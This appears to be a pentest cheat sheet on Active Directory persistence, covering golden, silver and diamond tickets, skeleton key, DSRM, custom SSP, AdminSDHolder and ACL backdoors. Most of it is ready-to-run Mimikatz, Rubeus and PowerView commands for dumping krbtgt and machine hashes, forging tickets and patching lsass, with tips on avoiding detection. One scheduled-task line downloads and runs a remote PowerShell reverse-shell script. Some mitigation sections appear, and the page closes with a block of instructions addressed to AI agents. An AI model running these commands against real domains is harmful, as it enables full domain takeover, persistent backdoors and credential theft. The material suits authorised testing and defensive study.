# Persistence ## Tool - SharPersist {% embed url="" %} ## In**stall Chrome Extension For Persistence** {% embed url="" %} ## AD DS Persistence Insomnihack 2024 {% embed url="" %} {% embed url="" %} Or in French - LeHack 2023: {% embed url="" %} {% embed url="" %} ## Golden Tickets

{% embed url="" %} {% embed url="" %} `krbtgt` hash could be used to impersonate any user {% hint style="danger" %} *It is recommended to change the password of krbtgt account twice as password history is maintained for the account* {% endhint %} ### Mimikatz on DC to get krbt hash ```powershell Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc ``` ```powershell Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"' ``` ### DCSync (no code execution on the target DC) to get krbtgt hash ```powershell SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit" ``` {% hint style="info" %} *krbtgt hash could also be dump from NTDS.dit* {% endhint %} ### Create golden ticket {% hint style="success" %} *Using AES keys makes the attack more silent* {% endhint %} From any machine connected with DC #### Mimikatz ```powershell Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid: /aes256: /startoffset:0 /endin:600 /renewmax:10080 /ptt"' ``` #### BetterSafetyKatz ```powershell BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid: /aes256: /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" ``` #### Rubeus ```powershell Rubeus.exe golden /aes256: /sid: /ldap /user:Administrator /printcmd ``` ### Mitigation The following security control should be implemented to mitigate a Golden Ticket: * **Change the KRBTGT password every 12 months, or when the domain has been compromised or suspected to have been compromised.** Changing the KRBTGT password will invalidate any existing Golden Tickets that are being used. * To effectively change the KRBTGT user object’s password hash, and invalidate any Golden Tickets, the KRBTGT password must be reset twice. This is because both the new and old KRBTGT passwords are stored by Domain Controllers such that authentication in the domain is not disrupted during a KRBTGT password change. When resetting the KRBTGT password, it is important to ensure that sufficient time is allowed between password resets to ensure the new password has had time to replicate to all Domain Controllers. For more information, see Microsoft’s [guidance](https://learn.microsoft.com/en-au/windows-server/identity/ad-ds/manage/forest-recovery-guide/ad-forest-recovery-reset-the-krbtgt-password) and [PowerShell script](https://github.com/microsoftarchive/New-KrbtgtKeys.ps1) to assist with resetting the KRBTGT password. ## Silver Tickets

Whereas golden tickets are forged TGTs, silver tickets are forged service tickets (TGS) - Encrypted and signed by the hash of the service account (golden ticket is signed by the hash of krbtgt) {% embed url="" %} {% embed url="" %} ### Ex 1 : Access to file system on the DC {% hint style="success" %} *Using AES key is more silent* {% endhint %} ```powershell BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid: /target:dc.domain.local /service:CIFS /rc4: /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" ``` ```powershell Invoke-Mimikatz -Command "kerberos::golden /User:Administrator /domain:domain.local /sid: /target:dc.domain.local /service:CIFS /rc4: /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" ``` Can be use for other services: HOST, RPCSS, HTTP, etc. List of SPN: Ex: HTTP With Rubeus ```powershell Rubeus.exe silver /service:http/dc.domain.local /rc4: /sid: /ldap /user:Administrator /domain:domain.local /ptt ``` ### Ex 2 : Achieve command execution using silver ticket HOST SPN allow us to schedule a task on the target ```powershell BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid: /target:dc.domain.local /service:HOST /rc4: /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" ``` ```powershell Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid: /target:dc.domain.local /service:HOST /rc4: /startoffset:0 /endin:600 /renewmax:10080 /ptt"' ``` Schedule and execute a task ```powershell schtasks /create /S dc.domain.local /SC weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c \"iex (New-Object Net-WebClient).DownloadString('http://IP/Invoke-PowershellTcp.ps1')\"" schtasks /Run /S dc.domain.local /TN "STCheck" ``` {% embed url="" %} ### Mitigation The following security controls should be implemented to mitigate a Silver Ticket: * **Create User objects with SPNs as** [**group Managed Service Accounts (gMSAs)**](https://learn.microsoft.com/en-au/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview)**.** gMSAs have automatic password rotation, a 120-character password and simplified SPN management. These security features protect the password from being cracked, reducing the likelihood of a successful Silver Ticket. However, **if creating user objects with SPNs as gMSAs is not feasible, set a minimum 30-character password that is unique, unpredictable and managed is set.** * **Change all computer object (including Domain Controller) passwords every 30 days.** Malicious actors can establish persistence in Active Directory using a computer object’s password; ensuring all computer object passwords (including Domain Controller passwords) are changed every 30 days can mitigate this persistence technique. * **Ensure computer objects are not members of privileged security groups,** such as the Domain Admins security group. If malicious actors obtain a computer object’s password hash, then they gain any privileges the computer object has in the domain. * **Ensure the Domain Computers security group does not have write or modify permissions to any objects in Active Directory.** All computer objects are members of the Domain Computers security group. If this security group has rights over other objects, then malicious actors can use these rights to compromise other objects and potentially escalate their privileges and perform lateral movement. ## Diamond Tickets Decrypt a valid TGT, make changes to it and re-encrypt it using krbtgt account {% hint style="info" %} *More opsec safe than a golden ticket* {% endhint %} {% embed url="" %} {% embed url="" %} ``` Rubeus.exe diamond /krbkey: /user:target_username /password:target_password /enctype:aes /ticketuser:administrator /doamin:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createonly:C:\Windows\System32\cmd.exe /show /ptt ``` `/tgtdeleg` option in place of credentials in case we have access to a domain user ``` Rubeus.exe diamond /krbkey: /tgtdeleg /enctype:aes /ticketuser:administrator /doamin:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createonly:C:\Windows\System32\cmd.exe /show /ptt ``` ## Skeleton Key Patch a DC (lsass process) so that it allows access as any user with a single password {% embed url="" %} {% embed url="" %} {% hint style="danger" %} *Skeleton Key is not opsec safe ad is known to caus issues with AD CS* {% endhint %} Inject a skeleton key (password is `mimikatz`) on a DC. {% hint style="info" %} *DA privileges required* {% endhint %} ```powershell Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.domain.local ``` Now, we can access any machine with a valid username and password as "mimikatz" ```powershell Enter-PSSession -Computername dc -Credential domain\Administrator ``` In case lsass is running as a protected process, we need `mimidriv.sys` on disk of the target DC {% hint style="danger" %} *Very noisy in logs - Service installation (Kernel mode driver)* {% endhint %} ``` mimikatz# privilege::debug mimikatz# !+ mimikatz# !processprotect /process:lsass.exe /remove mimikatz# misc::skeleton mimikatz# !- ``` Modify the default key For example, to use "S3c3rtP\@ss", compute its RC4 and split it into 8 bytes stubs: ``` 56aa742a 6bebb9ca 62fc9f70 a2e00cd3 ``` Reverse the values by 2 bytes ``` 2a74aa56 cab9eb6b 709ffc62 d30ce0a2 ``` Prepend 0x to each and modify kiwikey array value in the code linked above ``` DWORD kiwiKey[] = {0x2a74aa56, 0xcab9eb6b, 0x709ffc62, 0xd30ce0a2} ``` ### Mitigation The following security controls should be implemented to mitigate Skeleton Key: * **Limit access to Domain Controllers to only privileged users that require access.** This reduces the number of opportunities for malicious actors to gain access to Domain Controllers. * **Restrict privileged access pathways to Domain Controllers to jump servers and secure admin workstations using only the ports and services that are required for administration.** Domain Controllers are classified as ‘Tier 0’ assets within Microsoft’s ‘[Enterprise Access Model](https://learn.microsoft.com/en-us/security/privileged-access-workstations/privileged-access-access-model)’. * **Run the LSASS process in protected mode.** This makes it more difficult to override the LSASS process, which is required for Skeleton Key to succeed. * **Implement Microsoft’s** [**vulnerable driver blocklist**](https://learn.microsoft.com/en-au/windows/security/application-security/application-control/windows-defender-application-control/design/microsoft-recommended-driver-block-rules)**.** Restricting known malicious or vulnerable drivers on Domain Controllers makes it more difficult for malicious actors to bypass LSASS protection. * **Restrict driver execution to an approved set.** Restricting the drivers that can be loaded on Domain Controllers to an approved set hardens it against attempts to bypass LSASS protection. This can be achieved through application control solutions, including Microsoft’s [Windows Defender Application Control](https://learn.microsoft.com/en-au/windows/security/application-security/application-control/windows-defender-application-control/wdac-and-applocker-overview). * **Only use Domain Controllers for AD DS and do not install any non-security-related services or applications.** This reduces the attack surface of Domain Controllers as there are fewer services, ports and applications that may be vulnerable and used to compromise a Domain Controller. * **Centrally log and analyse Domain Controller logs in a timely manner to identify malicious activity.** Domain Controller logs provide a rich source of information that is important for investigating potentially malicious activity on Domain Controllers and in the domain. * **Disable the Print Spooler service on Domain Controllers.** For example, malicious actors have targeted the Print Spooler service on Domain Controllers as a technique to authenticate to a system they control to collect the Domain Controllers computer object password hash or TGT. Malicious actors can then use this to authenticate to the Domain Controller they coerced and gain administrative access. ## DSRM - Directory Services Restore Mode There is a local admin "Administrator" on every DC whose password is DSRM. DSRM password is required when a server is promoted to DC and it is rarely changed {% embed url="" %} {% embed url="" %} {% embed url="" %} Dump DSRM password - DA privileges needed ```powershell Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dc ``` Compare the Administrator hash with the Administrator hash of below command ```powershell Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dc ``` Logon Behavior for the DSM account needs to be changed before passing the hash ```powershell Enter-PSSession -Computername dc New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD ``` or ```powershell Invoke-Command -ComputerName dc -ScriptBlock { New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD } ``` Pass the hash ```powershell Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc.domain.local /user:Administrator /ntlm: /run:powershell.exe"' ls \\dc\C$ ``` To use PSRemoting, we must force NTLM authentication: ```powershell Enter-PSSession -ComputerName dc -Authentication Negotiate ``` ## Custom SSP Security Support Provider is a DLL which provides ways for an application to obtain an authenticated session. Ex: NTLM, Kerberos, Wdigest, CredSSP Mimikatz `mimilib.dll` is a custom SSP that logs local logons, service account and machine account passwords in clear text on the target server {% hint style="success" %} *All local logons on the DC are logged to `C:\Windows\system32\mimilsa.log` or `C:\Windows\system32\kiwissp.log`* {% endhint %} ### Way 1 Drop `mimilib.dll` to `system32` and add mimilib to `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages` ```powershell $packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages' $packages += "mimilib" Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages ``` ### Way 2 Inject into lsass {% hint style="warning" %} *Not stable with Server 2019 and Server 2022* {% endhint %} ```powershell Invoke-Mimikatz -Command '"misc::memssp"' ``` ## AdminSDHolder Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder and any differences are overwritten on the object ACL {% embed url="" %} {% embed url="" %}

{% embed url="" %} ### Well Known abuse of Protected Groups

Protected Group	Abuse
Account Operators	Can modify DA/EA/BA groups. Can modify nested groups within these groups
Backup Operators	Backup GPO, edit to add SID of controlled account to a privileged group and Restore
Server Operators	Run a command as system (using the disabled Browser service)
Print Operators	Copy ntd.dit backup, load device drivers

{% content-ref url="/pages/0JuIBGgnkBTBoagEgA6o" %} [Group Privileges](/0xss0rz/pentest/privilege-escalation/windows/group-privileges.md) {% endcontent-ref %} ### Add FullPermissions to a user With DA privs, AdminSDHolder can be used as a backdoor/persistence mechanisme by adding a user with Full Permissions to the AdminSDHolder object #### With PowerView ```powershell Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -Verbose ``` #### With AD Module and RACE toolkit {% embed url="" %} ```powershell Set-DCPermissions -Method AdminSDHolder -SAMAccountName username -Right GenericAll -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -Verbose ``` ### Other permissions: ResetPassword, WriteMembers ```powershell Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights ResetPassword -PrincipalDomain domain.local -TargetDomain domain.local -Verbose ``` ```powershell Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights WriteMembers -PrincipalDomain domain.local -TargetDomain domain.local -Verbose ``` ### Run SDProp manually {% embed url="" %} ```powershell Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose ``` For pre-Server 2008: ```powershell Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose ``` ### Check Domain Admins permission #### PowerView ```powershell get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -matche "username} ``` #### AD Module ```powershell (Get-Acl -Path 'AD:\C:\CN=Domain Admins,CN=Users,DC=domain,DC=local').Access | ?{$_.IdentityReference -match 'username'} ``` ### Exploit **FullControl** PowerView ```powershell Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose ``` AD Module ```powershell Add-ADGroupMember -Identity 'Domain Admins' -Members testda ``` #### ResetPassword PowerView ```powershell Set-DomainUserPassword -Idenity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose ``` AD Module ```powershell Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose ``` ## Rights Abuse With DA privs, the ACL for the domain root can be modified to provide rights like FullControl or the ability to run DCSync ### FullControl Add FullControl rights: #### With PowerView ```powershell Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -Verbose ``` #### With AD Module and RACE toolkit ```powershell Set-ADCL -SAMAccountName username -Right GenericAll -DistinguishedName 'DC=domain,DC=local' -Verbose ``` #### [Exploit](#exploit) ### DCSync Add rights for DCSync: #### With PowerView ```powershell Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights DCSync -PrincipalDomain domain.local -TargetDomain domain.local -Verbose ``` #### With AD Module and RACE toolkit ```powershell Set-ADCL -SAMAccountName username -GUIDRight DCSync -DistinguishedName 'DC=domain,DC=local' -Verbose ``` #### Execute DCSync {% content-ref url="/pages/xnKTwmiIoj8HdMcJZAjp" %} [DCSync](/0xss0rz/pentest/internal-pentest/dcsync.md) {% endcontent-ref %} ```powershell Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"' ``` ```powershell SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit" ``` ## Security Descriptors Modify Security Descriptors of multiple remote access methods to allow access to non-admin users. Admin privs are required With RACE toolkit: ### WMI On local machine for user1 ```powershell Set-RemoteWMI -SamAccoutName user1 -Verbose ``` On remote machine for user1 without explicit credentials ```powershell Set-RemoteWMI -SamAccoutName user1 -ComputerName dc -namespace 'root\cimv2' -Verbose ``` On remote machine with explicit credentials ```powershell Set-RemoteWMI -SamAccoutName user1 -ComputerName dc -Credential Administrator -namespace 'root\cimv2' -Verbose ``` On remote machine remove permissions ```powershell Set-RemoteWMI -SamAccoutName user1 -ComputerName dc -namespace 'root\cimv2' -Remove -Verbose ``` ### PS Remoting backdoor {% hint style="danger" %} *Not stable after August 2020 patches* {% endhint %} On local machine for user1 ```powershell Set-RemotePSRemoting -SamAccoutName user1 -Verbose ``` On remote machine for user1 without explicit credentials ```powershell Set-RemotePSRemoting -SamAccoutName user1 -ComputerName dc -Verbose ``` On remote machine, remove permissions ```powershell Set-RemotePSRemoting -SamAccoutName user1 -ComputerName dc -Remove ``` ### Remote Registry {% embed url="" %} With DAMP {% embed url="" %} ```powershell Add-RemoteRegBackdoor -ComputerName dc -Trustee user1 -Verbose ``` As user1, retrieve machine account hash {% hint style="success" %} *Get machine account hash for*[ *silver ticket attack*](#silver-tickets) {% endhint %} ```powershell Get-RemoteMachineAccountHash -ComputerName dc -Verbose ``` Retrieve local account hash ```powershell Get-RemoteLocalAccountHash -ComputerName dc -Verbose ``` Retrieve domain cached credentials ```powershell Get-RemoteCachedCredential -ComputerName dc -Verbose ``` ## msDS-AllowedToDelegateTo `SeEnableDelegationPrivilege` on the DC and full rights on the target user - default for Domain Admins and Enterprise Admins ### With Powershell ```powershell # PowerView Set-DomainObject-Identity devuser -Set @{serviceprincipalname='dev/svc'} Set-DomainObject-Identity devuser -Set @{"msds-allowedtodelegateto"="ldap/dc.domain.local"} Set-DomainObject-SamAccountName devuser -Xor @{"useraccountcontrol"="16777216"} Get-DomainUser –TrustedToAuth # AD Module Set-ADUser -Identity devuser -ServicePrincipalNames @{Add='dev/svc'} Set-ADUser -Identity devuser Add @{@{'msDS AllowedToDelegateTo' = @('ldap/dc', 'ldap/dc.domain.local)} -Verbose Set-ADAccountControl-Identity devuser -TrustedToAuthForDelegation $true Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo ``` ### With Kekeo ```powershell kekeo# tgt::ask /user:devuser /domain:domain.local /password:Sup3rPassword! kekeo# tgs::s4u /tgt:TGT_devuser@domain.local_krbtgt~domain.local@domain.local.kirbi /user:Administrator@domain.local /service:ldap/dc.domain.local Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@domain.local@domain.local_ldap~dc.domain.local@domain.local.kirbi"' Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"' ``` ### With Rubeus ```powershell # Get RC4 hash Rubeus.exe hash /password:Sup3rPassword! /user:devuser /domain:domain.local Rubeus.exe s4u /user:devuser /rc4: /impersonateuser:administrator /msdsspn:ldap/dc.domain.local /domain:domain.local /ptt SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit" ``` ## Persistence in Linux {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/persistence.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.